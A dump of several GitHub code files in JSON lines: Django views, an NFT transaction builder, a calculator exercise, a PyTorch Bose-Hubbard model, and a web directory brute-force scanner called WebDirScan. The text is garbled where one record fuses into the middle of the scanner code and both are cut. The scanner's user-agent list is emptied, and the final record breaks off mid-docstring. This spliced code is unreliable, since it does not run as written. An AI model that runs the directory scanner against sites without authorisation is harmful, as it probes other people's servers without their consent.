+{"seq_id":"19941223341","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom main.forms import *\r\nfrom .models import *\r\nfrom django.http import JsonResponse\r\nfrom django.core.paginator import Paginator, EmptyPage, InvalidPage\r\nfrom django.db.models import Q\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files import File\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n\r\nimport json\r\nfrom chatall.models import Thread, ChatMessage\r\n\r\ndef get_search_query(query=None):\r\n    queryset= []\r\n    queries = query.split(\" \")\r\n    for q in queries:\r\n        if q != \"\":\r\n            searchs = Room.objects.filter(\r\n                Q(catagory__categoryname__icontains=q)).distinct()\r\n            \r\n\r\n            for post in searchs:\r\n                print(post)\r\n                queryset.append(post)\r\n    return list(set(queryset))\r\ndef get_other_users(request):\r\n    thread = Thread.objects.all()\r\n    other_users = []\r\n    mythread = []\r\n    for t in thread:\r\n        if request.user == t.first:\r\n            mythread.append(t)\r\n        elif request.user == t.second:\r\n            mythread.append(t)\r\n    for my in mythread:\r\n        if request.user != my.first:\r\n            other_users.append(my.first.username)\r\n        if request.user != my.second:\r\n            other_users.append(my.second.username)\r\n    if len(other_users) != 0:\r\n        return other_users[0]\r\n    else:\r\n        
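# note: a single username is returned above while an empty list falls through here;\r\n        # callers such as home_view only appear to truth-test the value, so the mixed types pass\r\n        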
return other_users\r\ndef home_view(request):\r\n #Thread.objects.get_message()\r\n \r\n context = {}\r\n search = request.POST.get('search')\r\n if search:\r\n #users = Room.objects.filter(catagory__categoryname=search.lower())\r\n #print(users)\r\n users = get_search_query(search)\r\n catagorys = Category.objects.filter(~Q(categoryname__icontains=search.lower()))\r\n\r\n if users:\r\n context = {'ids':search,'users':users,'catagorys':catagorys}\r\n return render(request,'main/roomdetail.html',context)\r\n\r\n searchRoom = Category.objects.all()\r\n\r\n if request.user.is_authenticated:\r\n form = CompleteUserProfileForm(request.POST, request.FILES,instance=request.user)\r\n if form.is_valid():\r\n form.save()\r\n form = CompleteUserProfileForm()\r\n \r\n useraddress = request.POST.get('firstname')\r\n #searchRoom = Room.objects.filter(roomname=search)\r\n if searchRoom:\r\n room_list = searchRoom\r\n else:\r\n room_list =Room.objects.all()\r\n paginator = Paginator(room_list,4)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n rooms = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n rooms = paginator.page(paginator.num_pages)\r\n\r\n star = request.GET.get('starRateValue')\r\n context['rooms'] = rooms\r\n #context['star'] = star\r\n context['useraddress'] = useraddress\r\n context['catagorys'] = Category.objects.all()\r\n context['other_users'] = get_other_users(request)\r\n\r\n\r\n\r\n return render(request,'main/home.html',context)\r\n\r\n\r\n\r\n\r\ndef addroom_view(request):\r\n rate = request.POST.get('starRate')\r\n item_id = request.POST.get('item_id')\r\n #price = AddPriceBasic()\r\n if rate:\r\n rated = False\r\n response_data = {}\r\n response_data['starRate'] = rate + \" hira\"\r\n response_data['item_id'] = \"item id: \" + item_id\r\n user = request.user\r\n item = Room.objects.get(id=item_id)\r\n ra = Rate.objects.get_or_new(user,item.roomname)\r\n rt = Rate.objects.all()\r\n\r\n #for i in ite:\r\n #print(i.rate_amount)\r\n for rat in rt:\r\n ratEX = Rate.objects.get_or_new(rat.user,rat.room.roomname)\r\n if ra == ratEX:\r\n rated = True\r\n rat.rate_amount = rate\r\n rat.save(update_fields=['rate_amount'])\r\n ite = Rate.objects.set_total(item)\r\n return JsonResponse(response_data)\r\n\r\n if rated == False :\r\n rateSave = Rate.objects.create()\r\n rateSave.user = user\r\n rateSave.room = item\r\n rateSave.rate_amount = rate\r\n rateSave.save()\r\n ite = Rate.objects.set_total(item)\r\n return JsonResponse(response_data)\r\n #print(ra)\r\n\r\n context['other_users'] = get_other_users(request)\r\n else:\r\n context = {}\r\n #form = AddRoomForm(request.POST, request.FILES)\r\n form = AddServiceForm(request.POST, request.FILES)\r\n if request.POST:\r\n catagory = request.POST.get('catagory')\r\n if catagory != 'Catagory List':\r\n catagorys = Category.objects.get(categoryname=catagory)\r\n if catagorys:\r\n if form.is_valid():\r\n room = form.save(commit=False)\r\n room.catagory = catagorys\r\n room.room_user= request.user\r\n\r\n price = Price.objects.create()\r\n basic_price_title = request.POST.get('basic_price_title')\r\n basic_price = request.POST.get('basic_price')\r\n basic_price_discription = request.POST.get('basic_price_discription')\r\n basic_price_delivery = request.POST.get('basic_price_delivery')\r\n \r\n price.price_title = basic_price_title\r\n price.price_number = basic_price\r\n price.price_delivery = basic_price_delivery\r\n price.price_description = basic_price_discription\r\n \r\n 
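# persist the basic-tier Price first so the PriceBasic wrapper created just below can point at it\r\n                    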
price.save()\r\n\r\n pricebasic = PriceBasic.objects.create()\r\n pricebasic.price = price\r\n pricebasic.save()\r\n\r\n pricestandard = Price.objects.create()\r\n basic_price_title = request.POST.get('standard_price_title')\r\n basic_price = request.POST.get('standard_price')\r\n basic_price_discription = request.POST.get('standard_price_discription')\r\n basic_price_delivery = request.POST.get('standard_price_delivery')\r\n \r\n pricestandard.price_title = basic_price_title\r\n pricestandard.price_number = basic_price\r\n pricestandard.price_delivery = basic_price_delivery\r\n pricestandard.price_description = basic_price_discription\r\n \r\n pricestandard.save()\r\n\r\n standard = PriceStandard.objects.create()\r\n standard.price = pricestandard\r\n standard.save()\r\n\r\n\r\n pricepremium = Price.objects.create()\r\n basic_price_title = request.POST.get('premium_price_title')\r\n basic_price = request.POST.get('premium_price')\r\n basic_price_discription = request.POST.get('premium_price_discription')\r\n basic_price_delivery = request.POST.get('premium_price_delivery')\r\n \r\n pricepremium.price_title = basic_price_title\r\n pricepremium.price_number = basic_price\r\n pricepremium.price_delivery = basic_price_delivery\r\n pricepremium.price_description = basic_price_discription\r\n \r\n pricepremium.save()\r\n\r\n premium = PricePremium.objects.create()\r\n premium.price = pricepremium\r\n premium.save()\r\n\r\n room.pricebasic = pricebasic \r\n room.pricepremium = premium\r\n room.pricestandard = standard\r\n #return redirect('main:home_page')\r\n form.save()\r\n form = AddServiceForm()\r\n else:\r\n context['catagory_selection_error'] = \"Please Select A Catagory\"\r\n \r\n context['allroom'] = form\r\n context['allusers'] = Account.objects.all()\r\n context['catagorys'] = Category.objects.all()\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/addroom.html',context)\r\n\r\ndef regiser_view(request):\r\n context = {}\r\n if request.POST:\r\n form = RegistrationForm(request.POST)\r\n genderValue = request.POST.get('genderValue')\r\n print(genderValue) \r\n if form.is_valid():\r\n fr = form.save(commit=False)\r\n if genderValue == 'Male':\r\n #with open('static/images/dummy-profile-image-male.png', 'rb') as f:\r\n #data = f.read()\r\n #print(data,genderValue)\r\n fr.profile_image = 'dummy-profile-image-male.png'\r\n\r\n elif genderValue == 'Female':\r\n fr.profile_image = 'dummy-profile-image-Female.jpg' \r\n fr.save()\r\n email = form.cleaned_data.get('email')\r\n raw_password = form.cleaned_data.get('password1')\r\n account = authenticate(email=email, password=raw_password)\r\n if account:\r\n login(request, account)\r\n return redirect('main:home_page')\r\n else:\r\n context['registration_form'] = form\r\n else:\r\n form = RegistrationForm()\r\n context['registration_form'] = form\r\n return render(request,'main/register.html', context)\r\n\r\ndef login_view(request):\r\n context = {}\r\n user = request.user\r\n email = 'email'\r\n if user.is_authenticated:\r\n return redirect('main:home_page')\r\n if request.POST:\r\n form = AccountAuthonticationForm(request.POST)\r\n if form.is_valid():\r\n email = request.POST['email']\r\n password = request.POST['password']\r\n user = authenticate(email=email, password=password)\r\n if user:\r\n login(request, user)\r\n return redirect('main:home_page')\r\n\r\n else:\r\n form = AccountAuthonticationForm()\r\n\r\n context['login_form'] = form\r\n context['login'] = email\r\n return 
render(request,'main/login.html',context)\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n return redirect('main:home_page')\r\n\r\ndef single_view(request,singleuser):\r\n users = Room.objects.get(id=singleuser)\r\n if request.POST:\r\n comments = request.POST.get('addComment')\r\n if request.user.is_authenticated:\r\n if comments:\r\n comment = Comment.objects.create() \r\n comment.user = request.user\r\n comment.room = users\r\n comment.comment = comments\r\n comment.save()\r\n comments = ''\r\n Comments = Comment.objects.filter(room=users)\r\n paginator = Paginator(Comments,5)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n Comments = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n Comments = paginator.page(paginator.num_pages)\r\n\r\n all_images = []\r\n if users.roomimage1:\r\n all_images.append(users.roomimage1.url)\r\n else:\r\n all_images.append(users.roomimage.url)\r\n if users.roomimage2: \r\n all_images.append(users.roomimage2.url)\r\n if users.roomimage3:\r\n all_images.append(users.roomimage3.url)\r\n if users.roomimage4:\r\n all_images.append(users.roomimage4.url)\r\n\r\n servicess = Room.objects.filter(catagory__categoryname=users.catagory.categoryname).order_by('-total_rate')\r\n services = servicess.filter(~Q(id=singleuser))\r\n catagorys = Category.objects.filter(~Q(categoryname=singleuser))\r\n context = {'Comments':Comments,'users':users,'catagorys':catagorys,\r\n 'coms':Comment.objects.filter(room=users), 'other_users':get_other_users(request)\r\n ,'services':services, 'all_images':all_images}\r\n return render(request,'main/singleview.html',context)\r\n\r\ndef roomdetail_view(request,catagory):\r\n users = Room.objects.filter(catagory__categoryname=catagory).order_by('-total_rate')\r\n catagorys = Category.objects.filter(~Q(categoryname=catagory))\r\n context = {'ids':catagory,'users':users,'catagorys':catagorys,'other_users':get_other_users(request)}\r\n return render(request,'main/roomdetail.html',context)\r\n\r\n\r\ndef roombooking_view(request, slug):\r\n #data = json.loads(request.data)\r\n room_list = Room.objects.filter(~Q(id=slug))\r\n\r\n paginator = Paginator(room_list,3)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n rooms = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n rooms = paginator.page(paginator.num_pages)\r\n\r\n context = {}\r\n context['rooms'] = rooms\r\n context['bookroom'] = Room.objects.get(id=slug)\r\n #return JsonResponse('here we go', safe=False)\r\n return render(request,'main/roombooking.html',context)\r\n\r\ndef searchRoom_view(request,slug):\r\n context = {}\r\n search = request.GET.get('search')\r\n context['serachedrooms'] = Room.objects.filter(roomname=search)\r\n return render(request,'main/home.html',context)\r\ndef services_view(request):\r\n context = {}\r\n if request.user.is_authenticated:\r\n user = request.user\r\n context['services'] = Room.objects.filter(room_user=user)\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/services.html',context)\r\n\r\ndef serviceupdate_view(request, service_id):\r\n context = {}\r\n if request.user.is_authenticated:\r\n service_id = service_id\r\n service = Room.objects.get(id=service_id)\r\n if request.POST:\r\n\r\n form = UpdateServiceForm(request.POST, request.FILES,instance=service)\r\n #service.roomname = request.POST.get('roomname')\r\n #service.car_price = request.POST.get('car_price')\r\n 
#service.car_description = request.POST.get('car_description')\r\n            catagory = Category.objects.get(categoryname=request.POST.get('catagory'))\r\n            service.catagory = catagory\r\n            #service.roomimage = request.POST.get('roomimage')\r\n            #print(request.POST.get('roomimage'))\r\n            #if form.is_valid():\r\n                #print(service)\r\n                #room = form.save(commit=False)\r\n                #room.catagory = catagorys\r\n                #room.room_user= request.user\r\n                #room.save()\r\n            form.save()\r\n            service.save()\r\n                #form.save()\r\n                #form = AddServiceForm()\r\n\r\n            #else:\r\n                #print(form)\r\n\r\n            #service.rate_amount = rate\r\n            #service.save(update_fields=['rate_amount'])\r\n        context['service'] = service\r\n        context['catagorys'] = Category.objects.all()\r\n        context['other_users'] = get_other_users(request)\r\n    return render(request,'main/serviceupdate.html',context)\r\ndef notfound_view(request):\r\n    context = {}\r\n    context['other_users'] = get_other_users(request)\r\n    return render(request,'main/notfound.html',context)","repo_name":"hiruy535/gebetafreelance","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43825141457","text":"from gas import set_gas_limit, set_base, calculate_gas_max, set_gas_tip\nfrom config import EXPECTED_SALE_PER_UNIT, DESIRED_RETURN, MINT_PRICE_PER_UNIT, \\\n    UNITS, WALLET, RECIPIENT_ADDRESS, MINT_FUNCTION, CHAIN, Web3Instance\nfrom constants import WEI_TO_GWEI, ETH_TO_GWEI, MAINNET_ID, RINKEBY_ID\nfrom secrets import WALLETS\nimport time\n\n\ndef generate_transact_tx():\n    GAS_LIMIT = 21000\n    BASE = 80  # set_base() # return in gwei\n    TIP = 40  # get tip from https://etherscan.io/gastracker\n    MAX = calculate_gas_max(BASE, TIP)\n    VALUE = 0.01\n    tx, nonce, tx_error = None, None, None\n\n    try:\n\n        nonce = Web3Instance.eth.getTransactionCount(WALLETS[WALLET]['public'])\n\n        tx = {\n            'nonce': nonce,\n            'to': RECIPIENT_ADDRESS,\n            'value': Web3Instance.toWei(VALUE, 'ether'),\n            'gas': GAS_LIMIT,\n            'maxPriorityFeePerGas': Web3Instance.toWei(TIP, 'gwei'),\n            'maxFeePerGas': Web3Instance.toWei(MAX, 'gwei'),\n            'chainId': CHAIN,\n        }\n\n    except:\n        tx_error = \"Failed to generate transaction.\"\n\n    return tx, nonce, tx_error\n","repo_name":"evm-labs/NFT-Minter","sub_path":"src/transact_setup.py","file_name":"transact_setup.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70467901172","text":"from time import sleep\nc=0\nwhile c!=5:\n    n1=int(input('Enter a number: '))\n    n2=int(input('Another number: '))\n    print('''------- Choose an option -------\n    [1] Add\n    [2] Multiply\n    [3] Show the larger number\n    [4] Enter new numbers\n    [5] Exit the program''')\n    c=int(input('>>>>> Enter your choice: '))\n    if c==1:\n        print('The result of {} + {} is {}'.format(n1,n2,n1+n2))\n    elif c==2:\n        print('The product of {} x {} is {}'.format(n1,n2,n1*n2))\n    elif c==3:\n        if n1>n2:\n            mn=n1\n        elif n1==n2:\n            mn=n1\n        else:\n            mn=n2\n        print('The larger number entered was {} '.format(mn))\n    elif c==4:\n        print('Enter the numbers again:')\n        n1=int(input('First value: '))\n        n2=int(input('Second value: '))\n    elif c==5:\n        print('Finishing...')\n    else:\n        print('Invalid choice, try again')\n    sleep(2)\n    
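# separator printed after every round of the loop, including the final pass for option 5\n    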
print('-=-'*20)\n","repo_name":"atico0/python","sub_path":"python_exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7136083424","text":"import copy\nimport random\nimport time\nimport math\nimport numpy as np\nimport argparse\nimport os\nimport datetime\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport torch.optim as optim\nimport torch.cuda\n\n# Options meant to be modified\n#################################################################################\n#  the d_ prefix stands for \"default\"; these can be overridden from the command line\nd_EPOCH = 2000\n# number of lattice points and number of particles\nd_LATTICE = 11\nd_PARTICLE = 9\n# parameters\nd_U = 2\nd_J = 1\n# output: name of the data to output\nd_OUTPUT_FILE_NAME = \"AAA\"\n# 'cuda' to use the GPU, 'cpu' for the CPU\nd_GPU = 'cuda'\n\n################################################################################\n\n# learning rate\nLR = 0.001\nLR_STEP = 1000\nLR_GAMMA = 0.1\nMOMENTUM = 0.95\n# constants\nMEMO_NAME = \"memo.txt\" # for recording the run conditions\nSAMPLE_NUM = 1000\nnet_num = 20\nOUTPUT_NAME = \"RESULT\"\nKILL_DATA = 50\n\n\n# Build the neural network itself\nclass MyModel(nn.Module):\n    def __init__(self):\n        super().__init__()\n        # fully connected network\n        self.l1 = nn.Linear(LATTICE, net_num)\n        self.l2 = nn.Linear(net_num, 2)\n\n    def forward(self, x):\n        # nonlinear activation (the original comment said relu, but tanh is applied)\n        h1 = torch.tanh(self.l1(x))\n        y = self.l2(h1)\n        return y\n\n\nclass MyLoss(nn.Module):\n    def __init__(self, sample_num):\n        super().__init__()\n        self.i_vector_array = [np.arange(LATTICE) for i in range(sample_num)]\n        self.i_vector_array = np.array(self.i_vector_array)\n        self.i_vector_array = torch.from_numpy(self.i_vector_array)\n        self.i_vector_array = self.i_vector_array.to(DEVICE)\n\n    def forward(self, n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, sample_num):\n        cn_tensor_1 = (torch.exp(cn_tensor_1[:, :, 0]) * torch.exp(cn_tensor_1[:, :, 1] * 1j)) / (\n                torch.exp(cn_array[:, 0]) * torch.exp(cn_array[:, 1] * 1j))\n        cn_tensor_2 = (torch.exp(cn_tensor_2[:, :, 0]) * torch.exp(cn_tensor_2[:, :, 1] * 1j)) / (\n                torch.exp(cn_array[:, 0]) * torch.exp(cn_array[:, 1] * 1j))\n        return (-J * torch.sum(torch.sqrt(n_vector_array[:, 0:LATTICE - 1] * (n_vector_array[:, 1:LATTICE] + 1)) *\n                               torch.t(torch.conj(cn_tensor_1))\n                               + torch.sqrt((n_vector_array[:, 0:LATTICE - 1] + 1) * n_vector_array[:, 1:LATTICE]) *\n                               torch.t(torch.conj(cn_tensor_2)))\n                + J * torch.sum(self.i_vector_array ** 2 * n_vector_array)\n                - J * (LATTICE - 1) * torch.sum(self.i_vector_array * n_vector_array)\n                + ((LATTICE - 1) ** 2 * J / 4 - U / 2) * torch.sum(n_vector_array)\n                + U / 2 * torch.sum(n_vector_array ** 2)) / sample_num\n\n\ndef est_particle(n_vector_array, i, sample_num):\n    return torch.sum(n_vector_array[:, i]) / sample_num\n\n\ndef metropolis(sample_num, my_net):\n    # when using the GPU, move the data with .to(DEVICE)\n    # build the array of sampled vectors to return\n    n_vector_array = np.zeros([sample_num, LATTICE])\n    n_vector_array = torch.from_numpy(n_vector_array).float()\n    n_vector_array = n_vector_array.to(DEVICE)\n    # working vector\n    temp_vector = np.zeros([LATTICE])\n    temp_vector = torch.from_numpy(temp_vector).float()\n    temp_vector = temp_vector.to(DEVICE)\n\n    rand_idx = random.randrange(LATTICE)\n    temp_vector[rand_idx] = PARTICLE\n    for j in range(PARTICLE * 5):\n        temp_vector = shuffle_vector(temp_vector)\n    for i in range(sample_num + KILL_DATA):\n        new_vector = shuffle_vector(temp_vector)\n        a1 = torch.sum(temp_vector != 0)\n        a2 = torch.sum(new_vector != 0)\n        b1 = my_net(temp_vector)\n        b1 = torch.exp(b1[0]) * torch.exp(b1[1] * 1j)\n        b2 = my_net(new_vector)\n        b2 = 
torch.exp(b2[0]) * torch.exp(b2[1] * 1j)\n        alpha = (abs(b2) / abs(b1)) ** 2 * (a1 / a2)\n        if alpha < random.random():\n            new_vector = temp_vector\n        if i >= KILL_DATA:\n            n_vector_array[i - KILL_DATA] = new_vector\n    return n_vector_array\n\n\ndef shuffle_vector(n_vector):\n    result_n_vector = copy.deepcopy(n_vector)\n    while True:\n        down = random.randrange(LATTICE)\n        if not result_n_vector[down] == 0:\n            break\n    while True:\n        up = random.randrange(LATTICE)\n        if not down == up:\n            break\n    result_n_vector[down] -= 1\n    result_n_vector[up] += 1\n    return result_n_vector\n\n\ndef make_sample(n_vector_array, sample_num):\n    n_vector_tensor_1 = np.zeros([LATTICE - 1, sample_num, LATTICE])\n    n_vector_tensor_1 = torch.from_numpy(n_vector_tensor_1).float()\n    n_vector_tensor_1 = n_vector_tensor_1.to(DEVICE)\n    n_vector_tensor_2 = np.zeros([LATTICE - 1, sample_num, LATTICE])\n    n_vector_tensor_2 = torch.from_numpy(n_vector_tensor_2).float()\n    n_vector_tensor_2 = n_vector_tensor_2.to(DEVICE)\n    for i in range(LATTICE - 1):\n        n_vector_tensor_1[i] = copy.deepcopy(n_vector_array)\n        n_vector_tensor_1[i, :, i] -= 1\n        n_vector_tensor_1[i, :, i + 1] += 1\n        n_vector_tensor_2[i] = copy.deepcopy(n_vector_array)\n        n_vector_tensor_2[i, :, i] += 1\n        n_vector_tensor_2[i, :, i + 1] -= 1\n    return n_vector_tensor_1, n_vector_tensor_2\n\n\ndef learning():\n    # print the options\n    print('GPU: {}'.format(GPU))\n    print('# epoch: {}'.format(EPOCH))\n    print('# lattice_point_num: {}'.format(LATTICE))\n    print('# particle_num: {}'.format(PARTICLE))\n    print('# output_file: {}'.format(OUTPUT_FILE_NAME))\n    print('')\n\n    if not os.path.exists(OUTPUT_FILE_NAME):\n        os.mkdir(OUTPUT_FILE_NAME)\n    # write a memo so the run can be identified later\n    with open(OUTPUT_FILE_NAME + \"/\" + MEMO_NAME, mode='a') as f:\n        now_time = datetime.datetime.now()\n        f.write(\"\\n\" + __file__ + \" was executed. \" + now_time.strftime('%Y/%m/%d %H:%M:%S') + \"\\n Data used:\")\n        f.write(\"Number of epochs:\" + str(EPOCH) + \"\\n \")\n        f.write(\"GPU:\" + str(GPU) + \"\\n \")\n        f.write(\"lattice_point_num:\" + str(LATTICE) + \"\\n \")\n        f.write(\"particle_num:\" + str(PARTICLE) + \"\\n \")\n        f.write(\"Lr:\" + str(LR) + \"\\n \")\n        f.write(\"STEP:\" + str(LR_STEP) + \"\\n \")\n        f.write(\"Gamma:\" + str(LR_GAMMA) + \"\\n \")\n        f.write(\"Momentum:\" + str(MOMENTUM) + \"\\n \")\n    print(\"Starting data load\")\n\n    # instantiate the neural network\n    my_net: nn.Module = MyModel()\n    my_net = my_net.to(DEVICE)\n    # optimization algorithm\n    optimizer = optim.SGD(params=my_net.parameters(), lr=LR, momentum=MOMENTUM)\n    scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEP, gamma=LR_GAMMA)\n\n    criterion = MyLoss(SAMPLE_NUM)\n\n    # for storing the training history\n    history = {'train_loss': [], 'test_loss': [], 'now_time': [], }\n\n    # start training; repeat for the requested number of epochs\n    for e in range(EPOCH):\n        # training step\n        my_net.eval()\n        with torch.no_grad():\n            train_n_vector_array = metropolis(SAMPLE_NUM, my_net)\n            train_n_vector_tensor_1, train_n_vector_tensor_2 = make_sample(train_n_vector_array, SAMPLE_NUM)\n        my_net.train(True)\n        optimizer.zero_grad()\n        cn_array = my_net(train_n_vector_array)\n        cn_tensor_1 = my_net(train_n_vector_tensor_1)\n        cn_tensor_2 = my_net(train_n_vector_tensor_2)\n        energy = criterion(train_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM)\n        energy.backward()\n        optimizer.step()\n        train_loss = energy.item()\n        scheduler.step()\n        # test step\n        if e % 10 == 0:\n            history['train_loss'].append(train_loss)\n            my_net.eval()\n            with torch.no_grad():\n                test_n_vector_array = metropolis(SAMPLE_NUM, my_net)\n                test_n_vector_tensor_1, test_n_vector_tensor_2 = make_sample(test_n_vector_array, 
SAMPLE_NUM)\n                cn_array = my_net(test_n_vector_array)\n                cn_tensor_1 = my_net(test_n_vector_tensor_1)\n                cn_tensor_2 = my_net(test_n_vector_tensor_2)\n                energy = criterion(test_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM)\n                test_loss = energy.item()\n            history['test_loss'].append(test_loss)\n            # record the progress and display it\n            now_time = datetime.datetime.now()\n            history['now_time'].append(now_time.strftime('%Y/%m/%d %H:%M:%S'))\n            print('Train Epoch: {}/{} \\t TrainLoss: {:.6f} \\t TestLoss: {:.6f} \\t time: {} \\t lr:{}'\n                  .format(e + 1, EPOCH, train_loss, test_loss, now_time.strftime('%Y/%m/%d %H:%M:%S'),\n                          scheduler.get_last_lr()[0]))\n\n    print(\"Training finished\")\n    # run the final estimation\n    my_net.eval()\n    n_vector_result = np.zeros([LATTICE])\n    with torch.no_grad():\n        est_n_vector_array = metropolis(SAMPLE_NUM * 10, my_net)\n        est_n_vector_tensor_1, est_n_vector_tensor_2 = make_sample(est_n_vector_array, SAMPLE_NUM * 10)\n        cn_array = my_net(est_n_vector_array)\n        cn_tensor_1 = my_net(est_n_vector_tensor_1)\n        cn_tensor_2 = my_net(est_n_vector_tensor_2)\n        energy = criterion(est_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM * 10)\n        for i in range(LATTICE):\n            n_vector_result[i] = est_particle(est_n_vector_array, i, SAMPLE_NUM * 10)\n        est_loss = energy.item()\n\n    # save the results\n    if not os.path.exists(args.out + \"/\" + OUTPUT_NAME):\n        os.mkdir(args.out + \"/\" + OUTPUT_NAME)\n    torch.save(my_net.state_dict(), args.out + \"/\" + OUTPUT_NAME + \"/\" + 'model.pth')\n    with open(args.out + \"/\" + OUTPUT_NAME + \"/\" + 'result.txt', mode='a') as f:\n        f.write(\"\\n \\n \" + str(est_loss))\n        f.write(\"\\n \\n \" + str(n_vector_result))\n    with open(args.out + \"/\" + OUTPUT_NAME + \"/\" + 'history.txt', mode='a') as f:\n        f.write(\"\\n \\n \" + str(history))\n\n    print(\"Done\")\n    # note the finish time\n    now_time = datetime.datetime.now()\n    with open(args.out + \"/\" + MEMO_NAME, mode='a') as f:\n        f.write(\"\\nFinished \" + now_time.strftime('%Y/%m/%d %H:%M:%S') + \"\\n\\n\")\n\n    return str(est_loss), str(n_vector_result)\n\n\nif __name__ == '__main__':\n    # set up the options for running the program from the command line\n    parser = argparse.ArgumentParser(description='Pytorch' + __file__)\n    parser.add_argument('--epoch', '-e', type=int, default=d_EPOCH,\n                        help='Number of sweeps over the dataset to train')\n    parser.add_argument('--gpu', '-g', type=str, default=d_GPU,\n                        help='if you want to use GPU, select cuda. 
cpu for cpu')\n parser.add_argument('--M', '-m', default=d_LATTICE,\n help='number of lattice points')\n parser.add_argument('--N', '-n', default=d_PARTICLE,\n help='number of particle')\n parser.add_argument('--U', '-u', default=d_U,\n help='value of U')\n parser.add_argument('--J', '-j', default=d_J,\n help='value of J')\n parser.add_argument('--out', '-o', default=d_OUTPUT_FILE_NAME,\n help='output file name')\n args = parser.parse_args()\n\n EPOCH = args.epoch\n GPU = args.gpu\n LATTICE = args.M\n PARTICLE = args.N\n U = args.U\n J = args.J\n OUTPUT_FILE_NAME = args.out\n DEVICE = torch.device(GPU)\n\n result = learning()\n print(\"ene\" + result[0])\n print(\"num\" + result[1])\n \"\"\" \n aaa = MyModel()\n aaa.to(DEVICE)\n ddd = MyLoss(SAMPLE_NUM)\n ggg = optim.SGD(params=aaa.parameters(), lr=LR, momentum=MOMENTUM)\n start = time.time()\n bb1 = metropolis(SAMPLE_NUM, aaa)\n print(\"metro:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n bb2, bb3 = make_sample(bb1, SAMPLE_NUM)\n print(\"make:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n cc1 = aaa(bb1)\n cc2 = aaa(bb2)\n cc3 = aaa(bb3)\n print(\"net:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n fff = ddd(bb1, cc1, cc2, cc3, SAMPLE_NUM)\n print(\"loss:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n fff.backward()\n print(\"backward:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n ggg.step()\n print(\"optim:{0}\".format(time.time() - start) + \"[sec]\")\n print(fff)\n \"\"\"\n","repo_name":"WATABE-Shintaro/Bose_Hubbard_model","sub_path":"New_NBH/NBH_B.py","file_name":"NBH_B.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42985412140","text":"number=int(input())\n\ndef multiplesOf3And5(number):\n i=0;\n sum0=0;\n sum1=0;\n sumBoth=0\n while i' + url + '')\n result.write('\\r\\n
')\n result.close()\n except Exception:\n pass\n\n def msg(self):\n per = 100 - (float(self._queue.qsize()) / float(self._total) * 100)\n percent = \"%s Finished| %s All| Scan in %1.f %s\" % ((self._total - self._queue.qsize()), self._total, per, '%')\n sys.stdout.write('\\r' + '[*]' + percent)\n\n def start(self):\n result = open('result.html', 'w')\n result.close()\n queue = Queue()\n f = open('dict.txt', 'r')\n for i in f.readlines():\n queue.put(self.url + \"/\" + i.rstrip('\\n'))\n total = queue.qsize()\n threads = []\n thread_count = int(self.count)\n for i in range(thread_count):\n threads.append(self.DirScan(queue, total))\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n\n\ndef get_user_agent():\n user_agent_list = [\n {},\n {},\n {},\n {},\n ]\n return random.choice(user_agent_list)\n\n\ndef main():\n print('''\n \n \n \n \n Welcome to WebDirscan\n Version:1.0 Author:%s\n '''%__author__)\n parser = OptionParser('python WebDirScan.py -u -f [-t ]')\n parser.add_option('-u', '--url', dest='url', type='string', help='target url for scan')\n parser.add_option('-f', '--file', dest='file_name', type='string', help='dictionary filename')\n parser.add_option('-t', '--thread', dest='count', type='int', default=10, help='scan thread count')\n options, args = parser.parse_args()\n if options.url and options.file_name:\n dirscan = WebDirScan(options)\n dirscan.start()\n sys.exit(1)\n else:\n parser.print_help()\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HKirito/DirSearch","sub_path":"DirSearch.py","file_name":"DirSearch.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17771426212","text":"from src import constants, globalvars, game\n\n\nclass ComItem:\n \"\"\"Item component that gives actor objects item-like properties and functionality.\n\n Attributes\n ----------\n item_desc : str\n A description of the item.\n weight : int, optional\n The weight value in wu (weight units) of the item.\n item_type : str, optional\n Type of item (gold, consumable, magic, equipment, etc.)\n use_function : function, optional\n Function that's executed when item is used.\n value : int, optional\n Value of the item if it holds one (gold, exp etc.).\n container : ComContainer\n The specific container object the item resides in. 
